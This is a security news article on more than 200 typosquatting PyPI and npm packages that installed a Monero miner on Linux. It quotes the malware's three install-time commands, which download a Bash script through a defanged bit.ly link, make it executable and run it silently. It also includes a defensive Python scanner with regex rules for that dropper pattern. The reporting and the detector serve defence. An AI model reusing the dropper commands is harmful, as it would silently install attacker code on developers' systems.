Experts have again discovered malware in the PyPI and npm repositories: more than 200 packages rely on typosquatting and contain cryptocurrency miners for Linux systems.
Let me remind you that we said that Malicious Packages from PyPi Arrange DDoS Attacks on Counter-Strike Servers, and also that 10 Malicious PyPI Packages Steal Credentials. The problem was first noticed by independent information security researcher Hauke Lubbers, who found “at least 33 packages” on PyPI that ran the XMRig miner, which mines the Monero cryptocurrency.
Typosquatting was used to distribute them: the malicious package is installed when a user mistypes the name of a real, popular package (developers usually install packages from the terminal, so typos are common). For example, the malware imitated React, argparse and AIOHTTP.
While Lubbers was notifying the PyPI administration of his discovery, the same attacker began publishing another set of 22 packages with the same payload.
The researcher says that all packages were targeted at Linux systems and contained a code fragment that downloaded a Bash script from the attacker’s server through the Bit.ly URL shortening service:
os.system("sudo wget https://bit[.]ly/3c2tMTT -O ./.cmc -L >/dev/null 2>&1")
os.system("chmod +x .cmc >/dev/null 2>&1")
os.system("./.cmc >/dev/null 2>&1")
Lubbers explains that the URL on bit.ly points to a script hosted at 80.78.25[.]140:8000. Once executed, this script notifies its operator of the IP address of the compromised host and the successful deployment of the miner.
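The three lines quoted above follow a recognisable install-time dropper shape: shell out, fetch a file through a URL shortener, mark it executable, run it with output silenced. The following is an added example (not code from the article) of a small static check that parses Python source with the standard `ast` module, collects string commands passed to os.system, os.popen or the common subprocess helpers, and matches them against that shape. The SAMPLE source is constructed from the defanged lines in the article, and the rule set is illustrative rather than a complete detector.

```python
# Added example: static scan for the fetch-and-execute dropper pattern.
# SAMPLE is constructed from the article's defanged lines; RULES are illustrative.
import ast
import re

SHELL_FUNCS = {("os", "system"), ("os", "popen"), ("subprocess", "run"),
               ("subprocess", "call"), ("subprocess", "Popen"),
               ("subprocess", "check_output")}

RULES = {
    # wget/curl followed by a URL anywhere in the same command
    "downloads remote file": re.compile(r"\b(wget|curl)\b.*https?://"),
    # matches both 'bit.ly' and the defanged 'bit[.]ly'
    "uses URL shortener": re.compile(r"\b(bit\[?\.\]?ly|tinyurl\.com|is\.gd)\b"),
    "marks file executable": re.compile(r"\bchmod\s+\+x\b"),
    # a dotfile in the current directory, e.g. './.cmc'
    "references hidden dotfile": re.compile(r"(^|\s)\./\.[\w.-]+"),
    "silences output": re.compile(r">\s*/dev/null\s+2>&1"),
}

SAMPLE = '''
import os
os.system("sudo wget https://bit[.]ly/3c2tMTT -O ./.cmc -L >/dev/null 2>&1")
os.system("chmod +x .cmc >/dev/null 2>&1")
os.system("./.cmc >/dev/null 2>&1")
'''


def shell_strings(source: str):
    """Yield (lineno, command) for each string literal passed as the first
    argument to a shell-capable call such as os.system(...)."""
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call) or not node.args:
            continue
        func = node.func
        if not (isinstance(func, ast.Attribute) and isinstance(func.value, ast.Name)):
            continue
        if (func.value.id, func.attr) not in SHELL_FUNCS:
            continue
        arg = node.args[0]
        if isinstance(arg, ast.Constant) and isinstance(arg.value, str):
            yield node.lineno, arg.value


def scan(source: str):
    """Return a list of (lineno, rule_name) findings; empty means nothing matched."""
    findings = []
    for lineno, cmd in shell_strings(source):
        for rule, pattern in RULES.items():
            if pattern.search(cmd):
                findings.append((lineno, rule))
    return findings


def looks_like_dropper(source: str) -> bool:
    """Download plus execute in the same file is the combination worth alerting on."""
    hit = {rule for _, rule in scan(source)}
    return "downloads remote file" in hit and (
        "marks file executable" in hit or "references hidden dotfile" in hit)


if __name__ == "__main__":
    for lineno, rule in scan(SAMPLE):
        print(f"line {lineno}: {rule}")
    print("dropper pattern:", looks_like_dropper(SAMPLE))
```

Run against setup.py and the package's top-level modules before installation, or as a CI gate over vendored dependencies; a single rule hit (output redirection, say) is common in legitimate code, which is why only the download-and-execute combination is treated as an alert.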
Lubbers explains that he is doing this because “the cybersecurity community gets a lot from the open-source ecosystem,” and he feels it is his duty to repay it somehow:
Almost at the same time as Hauke Lubbers, Sonatype analysts discovered another 186 malicious packages on npm linked to the same URL for downloading the malicious Bash script.
Fortunately, both repositories quickly removed the typosquatting malware from their platforms, and the malicious packages are unlikely to cause much harm to developers.